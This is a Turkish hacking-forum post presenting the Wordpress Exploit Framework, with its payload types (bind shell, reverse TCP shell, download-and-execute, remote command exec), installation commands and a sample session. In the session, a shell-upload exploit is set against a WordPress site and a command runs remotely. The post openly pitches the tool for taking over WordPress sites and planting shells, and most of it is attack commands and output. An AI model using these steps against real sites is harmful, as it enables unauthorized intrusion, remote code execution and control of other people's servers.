Wordpress Exploit Framework //GHOSTCLOUD

GHOST CLOUD

Kıdemli Üye
25 Haz 2015
2,534
0
ÖTÜKEN
Wordpress Exploit Framework


uP22VC.jpg



Wordpress sitelerde bulunan birçok exploit zaafiyetini Wordpress Exploit Framework kullanarak ele geçirebilir veya shell yükleyebilirsiniz.
İçerisinde 288 Exploit, 58 Auxilaries, 7 Payload bulunmaktadır.


Exploit ve Auxiliary Modülleri Arasındaki Farklar

Auxiliary modülleri, hedef makineden bilgi almanıza, ayrıcalıkları yükseltmenize veya hizmet işlevselliklerini reddetmenize olanak tanır. Tüm bunları yaparken karşı makinede yük çalıştırmaz.

Exploit modülleri, exploit cihaza atıldıktan sonra çalıştırılan, makineden bilgi toplamak, uzaktan shell veya web sunucusuna bağlanmak için rastgele kod çalıştırmanıza olanak sağlayan paketler bulunduran bir derlemedir.


Yüklü Payloadlar

bind_php: Belirli bir bağlantı noktasına bağlanacak ve WPXF'nin shell oluşturmasına izin verecek bir komut dosyası yükler.

custom: Özel bir PHP betiğini yükler ve çalıştırır.

download_exec: İndirilebilen ve uzaktan çalıştırılabilen bir dosyayı çalıştırır.

exec: Uzak sunucuda bir shell komutu çalıştırır ve çıktıyı WPXF oturumuna döndürür.

reverse_tcp: Ters TCP shell' oluşturacak bir komut dosyası


Ön Kurulum

Eğer bundler sisteminizde yüklü değilse yükleyiniz.

Kod:
gem install bundler


C uzantılarını derlemek için gerekli tüm araçlara sahip olduğunuzdan emin olun.

Kod:
sudo apt-get install build-essential patch


Ayrıca, geliştirme dosyalarının sisteminizde yüklü olduğundan emin olun.

Kod:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev


Kurulum

Öncelikle kurulum için Masaüstüne geliyoruz.(Rahatça erişebilmek için masaüstüne yüklüyorum, isteyenler ana dizine yükleyebilirler.)

Kod:
cd Desktop

QFgThk.png


Daha sonra github'dan frameworkümüzü indirmek için aşağıdaki kodu giriyoruz.

Kod:
git clone https://github.com/rastating/wordpress-exploit-framework.git

By0BLD.png


Masaüstüne indirdiğimiz klasörümüze giriyoruz.

Kod:
cd wordpress-exploit-framework

OnziCm.png


Framework kurulumunu çalıştırıyoruz.(Sistemde yönetici olduğunuzdan emin olun.)

Kod:
bash rebuild_and_install_gem.sh

Yv99vk.png


Framework'ümüzü açıyoruz.

Kod:
ruby wpxf.rb

QFeGul.png


Ve bizi exploit framework'ümüzün girişi karşılıyor.

3vydKX.png


Örnek Kullanım

Kod:
wpxf > use exploit/shell/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wordpresssite     //wordpress açıklı site

[+] Set host => wordpresssite

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ //Açığın bulunduğu satır

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec    //Exploit için seçtiğimiz payload

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"   //Yüklenen shellde vermek istediğimiz mesaj

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run    //Çalıştırma komutu

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

Bunun gibi birçok exploit ve auxiliary mevcuttur. Bulmak için:

Kod:
show payloads
Kod:
show exploits
Kod:
show auxiliaries
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.